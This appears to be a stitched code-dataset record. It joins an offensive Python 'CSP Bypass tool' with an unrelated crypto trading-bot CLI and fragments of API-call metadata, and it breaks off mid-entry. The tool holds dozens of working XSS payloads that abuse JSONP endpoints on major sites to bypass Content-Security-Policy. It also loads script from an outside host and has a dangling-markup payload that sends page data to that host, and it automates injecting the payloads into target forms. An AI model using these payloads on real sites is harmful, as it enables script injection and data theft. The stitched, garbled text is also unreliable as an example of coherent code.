+ '/pre_activations', preactivate)\n", (3437, 3483), True, 'import tensorflow as tf\n'), ((3791, 3821), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {}), '()\n', (3819, 3821), True, 'import tensorflow as tf\n'), ((3926, 3954), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (3949, 3954), True, 'import tensorflow as tf\n'), ((6458, 6497), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (6465, 6497), True, 'import tensorflow as tf\n'), ((2452, 2473), 'tensorflow.square', 'tf.square', (['(var - mean)'], {}), '(var - mean)\n', (2461, 2473), True, 'import tensorflow as tf\n'), ((3370, 3402), 'tensorflow.matmul', 'tf.matmul', (['input_tensor', 'weights'], {}), '(input_tensor, weights)\n', (3379, 3402), True, 'import tensorflow as tf\n')] |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : @Ruulian_
# Date created : 31 Oct 2021
from random import choice
from requests_html import HTMLSession
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urljoin, urlparse
import argparse
import datetime
import json
import platform
import re
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
color = choice([35, 93, 33])
nonce_reg = r'nonce\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
sha_reg = r'sha\d{3}\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
general_payload = "alert()"
policies_fallback = {
"script-src":"default-src"
}
vulnerable_CSP_conf = {
"script-src" : [
{'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<script>{general_payload}</script>'},
{'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<img src=# onerror={general_payload}>'},
{'value': ['*'], 'patch':[], 'payload': '<script src="https://0xhorizon.eu/cspass/exploit.js"></script>'},
{'value': ['data:'], 'patch':[], 'payload': f'<script src="data:,{general_payload}"></script>'},
{'value':['https://cdnjs.cloudflare.com', 'unsafe-eval'], 'patch':[], 'payload':"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js\"></script><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };%s;//');}} </div>" % general_payload},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback={general_payload}"></script>'},
{'value': ['https://*.doubleclick.net'], 'patch':[], 'payload': f'"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback={general_payload}"></script>'},
{'value': ['https://*.googleadservices.com'], 'patch':[], 'payload': f'"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback={general_payload}"></script>'},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback={general_payload}"></script>'},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://accounts.google.com/o/oauth2/revoke?callback={general_payload}"></script>'},
{'value': ['https://*.blogger.com'], 'patch':[], 'payload': f'"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback={general_payload}"></script>'},
{'value': ['https://*.yandex.net'], 'patch':[], 'payload': f'"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback={general_payload}"></script>'},
{'value': ['https://*.yandex.ru'], 'patch':[], 'payload': f'"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback={general_payload}"></script>'},
{'value': ['https://*.vk.com'], 'patch':[], 'payload': f'"><script src="https://api.vk.com/method/wall.get?callback={general_payload}"></script>'},
{'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
{'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
{'value': ['https://*.alicdn.com'], 'patch':[], 'payload': f'"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback={general_payload}"></script>'},
{'value': ['https://*.taobao.com'], 'patch':[], 'payload': f'"><script+src="https://suggest.taobao.com/sug?callback={general_payload}"></script>'},
{'value': ['https://*.tbcdn.cn'], 'patch':[], 'payload': f'"><script+src="https://count.tbcdn.cn//counter3?callback={general_payload}"></script>'},
{'value': ['https://*.1688.com'], 'patch':[], 'payload': f'"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback={general_payload}"></script>'},
{'value': ['https://*.amap.com'], 'patch':[], 'payload': f'"><script+src="https://wb.amap.com/channel.php?callback={general_payload}"></script>'},
{'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback={general_payload};jsonp1"></script>'},
{'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3b{general_payload}%2f%2f794"></script>'},
{'value': ['https://*.uber.com'], 'patch':[], 'payload': f'"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback={general_payload};"></script>'},
{'value': ['https://*.buzzfeed.com'], 'patch':[], 'payload': f'"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback={general_payload}%2f%2f"></script>'},
{'value': ['https://*.co.jp'], 'patch':[], 'payload': f'"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback={general_payload}//></script>'},
{'value': ['https://*.yahooapis.jp'], 'patch':[], 'payload': f'"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback={general_payload}//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3b{general_payload}%2f%2f476&_=1537149044679"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback={general_payload};//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback={general_payload};//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>'},
{'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb={general_payload};"></script>'},
{'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback={general_payload}"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback={general_payload}//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback={general_payload}//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="http://search.twitter.com/trends.json?callback={general_payload}"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback={general_payload}"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback={general_payload}"></script>'},
{'value': ['https://*.sharethis.com'], 'patch':[], 'payload': f'"><script+src="https://www.sharethis.com/get-publisher-info.php?callback={general_payload}"></script>'},
{'value': ['https://*.addthis.com'], 'patch':[], 'payload': f'"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback={general_payload}"></script>'},
{'value': ['https://*.ngs.ru'], 'patch':[], 'payload': f'"><script+src="https://passport.ngs.ru/ajax/check?callback={general_payload}"></script>'},
{'value': ['https://*.ulogin.ru'], 'patch':[], 'payload': f'"><script+src="https://ulogin.ru/token.php?callback={general_payload}"></script>'},
{'value': ['https://*.meteoprog.ua'], 'patch':[], 'payload': f'"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback={general_payload}"></script>'},
{'value': ['https://*.intuit.com'], 'patch':[], 'payload': f'"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback={general_payload}"></script>'},
{'value': ['https://*.userlike.com'], 'patch':[], 'payload': f'"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback={general_payload}"></script>'},
{'value': ['https://*.youku.com'], 'patch':[], 'payload': f'"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback={general_payload}"></script>'},
{'value': ['https://*.mixpanel.com'], 'patch':[], 'payload': f'"><script+src="https://api.mixpanel.com/track/?callback={general_payload}"></script>'},
{'value': ['https://*.travelpayouts.com'], 'patch':[], 'payload': f'"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback={general_payload}"></script>'},
{'value': ['https://*.pictela.net'], 'patch':[], 'payload': f'"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback={general_payload};/json"></script>'},
{'value': ['https://*.adtechus.com'], 'patch':[], 'payload': f'"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback={general_payload};//window.proper_d31c1edc_57a8d6de_38"></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': '"><embed src=\'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch(e){%s}//\' allowscriptaccess=always>' % general_payload},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'ng-app"ng-csp ng-click=$event.view.{general_payload}><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'<script src=https://www.googleapis.com/customsearch/v1?callback={general_payload}'},
{'value': ['unsafe-inline', '*'], 'patch':[], 'payload':f"<script>script=document.createElement('script');script.src='//0xhorizon.eu/cspass/exploit.js';window.frames.document.head.appendChild(script);</script>"}
]
}
def date_formatted():
return datetime.datetime.now().strftime("%H:%M:%S")
def parse_cookies(arg:str):
cookies = {}
cookies_arg = arg.split(";")
for c in cookies_arg:
cookie = c.split("=")
try:
cookies[cookie[0]] = cookie[1]
except IndexError:
raise argparse.ArgumentTypeError("Cookies must be specified with key=value")
return cookies
class Scanner:
def __init__(self, target, no_colors=False, dynamic=False, all_pages=False, cookies={}, secure=False):
self.no_colors = no_colors
self.all_pages = all_pages
self.dynamic = dynamic
self.target = target
self.secure = secure
self.pages = [self.target]
self.cookies = cookies
self.sess = HTMLSession()
def print(self, message=""):
if self.no_colors:
message = re.sub("\x1b[\[]([0-9;]+)m", "", message)
print(message)
def succeed(self, message=""):
self.print(f"[\x1b[92mSUCCEED\x1b[0m] {message}")
def info(self, message=""):
self.print(f"[\x1b[96m{date_formatted()}\x1b[0m] {message}")
def vuln(self, message=""):
self.print(f"[\x1b[93mVULN\x1b[0m] {message}")
def fail(self, message=""):
self.print(f"[\x1b[95mFAIL\x1b[0m] {message}")
def error(self, message=""):
self.print(f"[\x1b[91mERROR\x1b[0m] {message}")
def banner(self):
self.print(f"""\x1b[{color}m
______ _____ ____
/ ____// ___/ / __ \ ____ _ _____ _____
/ / \__ \ / /_/ // __ `// ___// ___/
/ /___ ___/ // ____// /_/ /(__ )(__ )
\____/ /____//_/ \__,_//____//____/\x1b[0m\x1b[3m by Ruulian\x1b[0m
\x1b[4mVersion\x1b[0m: 1.2
""")
def ping(self):
try:
r = self.sess.get(self.target, cookies=self.cookies, verify=self.secure)
r.raise_for_status()
except OSError:
return False
return True
def get_all_pages(self, page):
r = self.sess.get(page, cookies=self.cookies)
if r.text != "":
links = r.html.absolute_links
for link in links:
if link not in self.pages and urlparse(link).netloc == urlparse(self.target).netloc:
self.pages.append(link)
time.sleep(0.3)
class Page:
def __init__(self, url, cookies, secure=False):
self.url = url
self.cookies=cookies
self.secure = secure
self.sess = HTMLSession()
self.csp = self.get_csp()
self.vulns = []
def get_csp(self):
data = {}
r = self.sess.head(self.url, verify=self.secure)
if 'Content-Security-Policy' in r.headers.keys():
csp = r.headers['Content-Security-Policy']
for param in csp.strip().strip(';').split(';'):
matched = re.search("^([a-zA-Z0-9\-]+)( .*)?$", param.strip())
csp_name, csp_values = matched.groups()
if csp_values is not None:
csp_values = [v.rstrip("'").lstrip("'") for v in csp_values.strip().split(' ')]
else:
csp_values = []
data[csp_name] = csp_values
return data
def format_csp(self):
csp = {}
for policyname in self.csp:
csp[policyname] = " ".join(self.csp[policyname])
csp = json.dumps(
csp,
indent=4
)
return csp
def get_forms(self):
r = self.sess.get(self.url, cookies=self.cookies)
if r.text != "":
forms = r.html.find("form")
return forms
return []
def test_patch(self, patches):
for patch in patches:
patch_policy_name = patch[0]
patch_policy_value = patch[1]
if patch_policy_name in self.csp:
r = re.compile(patch_policy_value)
if any([r.match(x) for x in self.csp[patch_policy_name]]):
return True
return False
def scan(self):
vuln = False
csp_keys = self.csp.keys()
new_csp_keys = []
for policy, fallback in policies_fallback.items():
if fallback in csp_keys and policy not in csp_keys:
new_csp_keys.append((policy, fallback))
else:
new_csp_keys.append((policy, policy))
for policyname in new_csp_keys:
priority = policyname[0]
name = policyname[1]
if priority in vulnerable_CSP_conf.keys():
for exploit in vulnerable_CSP_conf[priority]:
if all(x in self.csp[name] for x in exploit['value']) and (exploit['patch'] == [] or not self.test_patch(exploit['patch'])):
policyvalue = " ".join(self.csp[name])
self.vulns.append({'value':f"{name} {policyvalue}", 'payload':exploit['payload']})
vuln = True
return vuln
class Form:
def __init__(self, url, action, method, names, cookies, secure=False):
self.url = url
self.action = action
self.method = method
self.names = names
self.cookies = cookies
self.secure = secure
self.sess = HTMLSession()
def test_dom(self):
parameters = {}
value = "<em>random_value_t0_test</em>"
for name, val in self.names.items():
if val == "":
parameters[name] = value
else:
parameters[name] = val
if self.method.lower() == "get":
r = self.sess.get(self.action, params=parameters, cookies=self.cookies, verify=self.secure)
elif self.method.lower() == "post":
r = self.sess.post(self.action, data=parameters, cookies=self.cookies, verify=self.secure)
if value in r.text:
return True
else:
return False
def exploit(self, payload, dangling=False):
domain = urlparse(self.url).netloc
if platform.system() == "Linux" or platform.system() == "Darwin":
log_path = "/dev/null"
else:
log_path = "NUL"
options = FirefoxOptions()
options.add_argument("--headless")
wb = webdriver.Firefox(options=options, service_log_path=log_path)
wb.get(self.url)
for key, value in self.cookies.items():
wb.add_cookie({'name':key, 'value':value, 'domain':domain})
for name in self.names:
form_input = wb.find_element_by_name(name)
form_input.clear()
form_input.send_keys(payload)
form = wb.find_element_by_tag_name("form")
form.submit()
time.sleep(0.5)
exploit = False
if dangling:
if urlparse(wb.current_url).netloc != domain:
exploit = True
else:
exploit = False
else:
try:
WebDriverWait(wb, 3).until(EC.alert_is_present())
alert = wb.switch_to.alert
alert.accept()
exploit = True
except TimeoutException:
exploit = False
wb.close()
return exploit
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='CSP Bypass tool')
parser.add_argument("--no-colors", dest="no_colors", action="store_true", help="Disable color mode")
parser.add_argument("-d", "--dynamic", dest="dynamic", action="store_true", help="Use dynamic mode")
parser.add_argument("-a", "--all-pages", dest="all_pages", action="store_true", help="Looking for vulnerability in all pages could be found", required=False)
parser.add_argument("-k", "--secure", dest="secure", action="store_true", help="Check SSL certificate")
required_args = parser.add_argument_group("Required argument")
required_args.add_argument("-t", "--target", dest="target", help="Specify the target url", required=True)
required_args = parser.add_argument_group("Authentication")
required_args.add_argument("-c", "--cookies", dest="cookies", help="Specify the cookies (key=value)", type=parse_cookies, required=False, default={})
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
scan = Scanner(target=args.target, no_colors=args.no_colors, dynamic=args.dynamic, all_pages=args.all_pages, cookies=args.cookies, secure=args.secure)
scan.banner()
scan.info(f"Starting scan on target \x1b[1m{scan.target}\x1b[0m\n")
scan.info("Pinging page")
if scan.ping():
scan.info("Page found\n")
else:
scan.error("Page not found")
exit()
if scan.all_pages:
scan.info("Detecting all pages...")
scan.get_all_pages(scan.target)
scan.info(f"{len(scan.pages)} pages found\n")
for p in scan.pages:
page = Page(p, scan.cookies, secure=scan.secure)
scan.info(f"Scanning page: \x1b[1m{page.url}\x1b[0m")
forms = page.get_forms()
if forms != []:
for form in forms:
if 'action' in form.attrs and form.attrs['action'] != '':
action = form.attrs['action']
else:
action = page.url
if 'method' in form.attrs:
method = form.attrs['method']
else:
method = "GET"
inputs = form.find("input") + form.find("textarea")
names = {}
for input_tag in inputs:
if "name" in input_tag.attrs:
name = input_tag.attrs["name"]
if "type" in input_tag.attrs and input_tag.attrs["type"] == "hidden":
try:
names[name] = input_tag.attrs["value"]
except:
pass
else:
names[name] = ''
new_form = Form(page.url, urljoin(page.url, action), method, names, scan.cookies, scan.secure)
if new_form.test_dom():
scan.info("Parameter reflected in DOM and no htmlspecialchars detected")
if page.csp != {}:
csps = page.format_csp()
scan.print()
scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
scan.print(csps)
scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
scan.print()
if page.scan():
vulns = page.vulns
scan.info(f"Number of vulnerabilities found: {len(vulns)}\n")
for vuln in vulns:
scan.vuln(f"Vulnerability: \x1b[1m{vuln['value']}\x1b[0m")
scan.vuln(f"Payload: {vuln['payload']}\n")
if scan.dynamic:
scan.info(f"Starting dynamic mode ...")
for vuln in vulns:
scan.info(f"Testing: \x1b[1m{vuln['value']}\x1b[0m")
if new_form.exploit(vuln['payload']):
scan.succeed(f"Payload found on \x1b[1m{page.url}\x1b[0m")
scan.succeed(f"Payload: {vuln['payload']}\n")
else:
scan.fail("Payload tested didn't work\n")
else:
scan.fail(f"No XSS found\n")
if scan.dynamic:
scan.info("Testing Dangling Markup ...")
dangling_markup_payload = "<meta http-equiv=\"refresh\" content='0; url=https://0xhorizon.eu?data="
if new_form.exploit(dangling_markup_payload, True):
scan.succeed(f"Dangling markup payload found: {dangling_markup_payload}\n")
else:
scan.fail("No dangling markup detected\n")
else:
scan.info("Perhaps you can exploit Dangling Markup\n")
else:
scan.fail(f"No CSP on page {page.url}\n")
else:
scan.fail("No parameter reflected in DOM or htmlspecialchars detected\n")
else:
scan.fail("No form found on this page\n")
scan.info("Scan finished")
| [
"random.choice",
"selenium.webdriver.support.ui.WebDriverWait",
"urllib.parse.urlparse",
"argparse.ArgumentParser",
"re.compile",
"selenium.webdriver.support.expected_conditions.alert_is_present",
"json.dumps",
"selenium.webdriver.Firefox",
"time.sleep",
"argparse.ArgumentTypeError",
"urllib3.di... | [((603, 670), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (627, 670), False, 'import urllib3\n'), ((680, 700), 'random.choice', 'choice', (['[35, 93, 33]'], {}), '([35, 93, 33])\n', (686, 700), False, 'from random import choice\n'), ((20011, 20080), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(True)', 'description': '"""CSP Bypass tool"""'}), "(add_help=True, description='CSP Bypass tool')\n", (20034, 20080), False, 'import argparse\n'), ((13311, 13324), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (13322, 13324), False, 'from requests_html import HTMLSession\n'), ((15145, 15158), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (15156, 15158), False, 'from requests_html import HTMLSession\n'), ((16044, 16069), 'json.dumps', 'json.dumps', (['csp'], {'indent': '(4)'}), '(csp, indent=4)\n', (16054, 16069), False, 'import json\n'), ((17988, 18001), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (17999, 18001), False, 'from requests_html import HTMLSession\n'), ((18924, 18940), 'selenium.webdriver.firefox.options.Options', 'FirefoxOptions', ([], {}), '()\n', (18938, 18940), True, 'from selenium.webdriver.firefox.options import Options as FirefoxOptions\n'), ((18997, 19058), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'options': 'options', 'service_log_path': 'log_path'}), '(options=options, service_log_path=log_path)\n', (19014, 19058), False, 'from selenium import webdriver\n'), ((19463, 19478), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (19473, 19478), False, 'import time\n'), ((12571, 12594), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (12592, 12594), False, 'import datetime\n'), ((13408, 13450), 're.sub', 're.sub', (['"""\x1b[\\\\[]([0-9;]+)m"""', '""""""', 'message'], {}), "('\\x1b[\\\\[]([0-9;]+)m', '', message)\n", (13414, 13450), False, 'import re\n'), ((18728, 18746), 'urllib.parse.urlparse', 'urlparse', (['self.url'], {}), '(self.url)\n', (18736, 18746), False, 'from urllib.parse import urljoin, urlparse\n'), ((12852, 12922), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['"""Cookies must be specified with key=value"""'], {}), "('Cookies must be specified with key=value')\n", (12878, 12922), False, 'import argparse\n'), ((16530, 16560), 're.compile', 're.compile', (['patch_policy_value'], {}), '(patch_policy_value)\n', (16540, 16560), False, 'import re\n'), ((18765, 18782), 'platform.system', 'platform.system', ([], {}), '()\n', (18780, 18782), False, 'import platform\n'), ((18797, 18814), 'platform.system', 'platform.system', ([], {}), '()\n', (18812, 18814), False, 'import platform\n'), ((14955, 14970), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (14965, 14970), False, 'import time\n'), ((19540, 19564), 'urllib.parse.urlparse', 'urlparse', (['wb.current_url'], {}), '(wb.current_url)\n', (19548, 19564), False, 'from urllib.parse import urljoin, urlparse\n'), ((19738, 19759), 'selenium.webdriver.support.expected_conditions.alert_is_present', 'EC.alert_is_present', ([], {}), '()\n', (19757, 19759), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((22840, 22865), 'urllib.parse.urljoin', 'urljoin', (['page.url', 'action'], {}), '(page.url, action)\n', (22847, 22865), False, 'from urllib.parse import urljoin, urlparse\n'), ((19711, 19731), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['wb', '(3)'], {}), '(wb, 3)\n', (19724, 19731), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((14836, 14850), 'urllib.parse.urlparse', 'urlparse', (['link'], {}), '(link)\n', (14844, 14850), False, 'from urllib.parse import urljoin, urlparse\n'), ((14861, 14882), 'urllib.parse.urlparse', 'urlparse', (['self.target'], {}), '(self.target)\n', (14869, 14882), False, 'from urllib.parse import urljoin, urlparse\n')] |
"""TODO: Add file description."""
import curio # async library
import logging # python standard logging library
import click # command line interface creation kit (click)
import click_log # connects the logger output to click output
from datasources.binance_csv import BinanceCSV
from datasources.binance_api import binance_api
from strategies.moving_average import moving_average
from strategies.dca import DCA
from exchanges.fake_exchange import FakeExchange
logging.basicConfig(
format='{asctime} - {name}: {levelname} $ {msg}',
style='{',
level=logging.INFO,
handlers=[
logging.FileHandler("last_run.log", mode='w'),
logging.StreamHandler()
]
)
logger = logging.getLogger(__name__)
click_log.basic_config(logger)
LOGO = '''
__ __
____ ____ ______/ /_ ____ / /_ ____ _____ ____ _____ ____ _
/ __ \/ __ `/ ___/ __ \/ __ \______/ __ \/ __ `/ __ \/ __ `/ __ \/ __ `/
/ / / / /_/ / /__/ / / / /_/ /_____/ /_/ / /_/ / / / / /_/ / / / / /_/ /
/_/ /_/\__,_/\___/_/ /_/\____/ /_.___/\__,_/_/ /_/\__,_/_/ /_/\__,_/
''' # noqa: E501, W291, W605
# These 3 dicts match the strings passed in to the command lines to the
# program modules. There is probably a cleaner/better way of acheiving
# this, but this works for now.
strategy_dict = {
"moving_average": moving_average,
"dca": DCA,
}
exchange_dict = {
"fake_exchange": FakeExchange,
}
datasource_dict = {
"binance_csv": BinanceCSV,
"binance_api": binance_api,
}
@click.command()
@click.option(
'--strategy',
help='Which strategy to use',
type=click.Choice(strategy_dict.keys(), case_sensitive=False)
)
@click.option(
'--strategy_params',
help='The parameters for the strategy, as a comma-separated list'
)
@click.option(
'--exchange',
help='Which exchange to use',
type=click.Choice(exchange_dict.keys())
)
@click.option(
'--datasource',
help='Which data source class to use',
type=click.Choice(list(datasource_dict.keys()))
)
@click.option(
'--datasource_path',
help='The path to the datasource csv or api endpoint',
type=click.Path(
exists=True,
file_okay=True,
dir_okay=False,
writable=False,
readable=True,
resolve_path=False,
allow_dash=True,
path_type=str
),
required=False
)
@click_log.simple_verbosity_option(logger)
def backtest(strategy, strategy_params, exchange, datasource, datasource_path):
"""TODO: Add description."""
if any(
[
strategy is None,
strategy_params is None,
exchange is None,
datasource is None
]
):
click.echo(
(
'Argument error. Run main.py backtest --help for info on the '
'arguments'
)
)
# We don't need to handle the case of these assignments failing because
# validaiton is handled for us by click
# TODO: --datasource_path is required for some strategies but not others
# - not sure how to get this working properly in click.
strategy_object = strategy_dict[strategy]
exchange_object = exchange_dict[exchange]
datasrce_object = datasource_dict[datasource]
from backtest import backtest_runner as bt
curio.run(
bt.run, strategy_object, exchange_object, datasrce_object,
strategy_params, datasource_path
)
# output_ddca = strategy_ddca.run('app/strategies/ddca.ini')
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option(
'--strategy_params',
help='The parameters for the strategy, as a comma-separated list'
)
@click.option('--exchange', help='Which exchange to use')
@click.option('--datasource', help='Which data source class to use')
def connect_to_api(strategy, strategy_params, exchange, datasource):
"""TODO: Add description."""
logger.info((
"This is where in the future we will connect to a live api and run "
"the strategy indefinitely."
))
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option('--datasource', help='Which data source class to use')
@click.option(
'--datasource_path',
help='The path to the datasource csv (if applicable)'
)
def optimise(strategy, datasource, datasource_path):
"""TODO: Add description."""
logger.info((
"This is where in the future we will run a training algorithm to "
"optimise the params of the strategy"
))
# Register the CLI commands
@click.group()
def cli():
"""TODO: Add description."""
pass
cli.add_command(backtest)
cli.add_command(connect_to_api)
cli.add_command(optimise)
# Entrypoint
if __name__ == '__main__':
logger.info(LOGO)
cli()
| [
"logging.getLogger",
"logging.StreamHandler",
"click_log.basic_config",
"click.option",
"click.group",
"click.echo",
"click.Path",
"logging.FileHandler",
"curio.run",
"click.command",
"click_log.simple_verbosity_option"
] | [((739, 766), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (756, 766), False, 'import logging\n'), ((767, 797), 'click_log.basic_config', 'click_log.basic_config', (['logger'], {}), '(logger)\n', (789, 797), False, 'import click_log\n'), ((1611, 1626), 'click.command', 'click.command', ([], {}), '()\n', (1624, 1626), False, 'import click\n'), ((1763, 1868), 'click.option', 'click.option', (['"""--strategy_params"""'], {'help': '"""The parameters for the strategy, as a comma-separated list"""'}), "('--strategy_params', help=\n 'The parameters for the strategy, as a comma-separated list')\n", (1775, 1868), False, 'import click\n'), ((2459, 2500), 'click_log.simple_verbosity_option', 'click_log.simple_verbosity_option', (['logger'], {}), '(logger)\n', (2492, 2500), False, 'import click_log\n'), ((3590, 3605), 'click.command', 'click.command', ([], {}), '()\n', (3603, 3605), False, 'import click\n'), ((3607, 3663), 'click.option', 'click.option', (['"""--strategy"""'], {'help': '"""Which strategy to use"""'}), "('--strategy', help='Which strategy to use')\n", (3619, 3663), False, 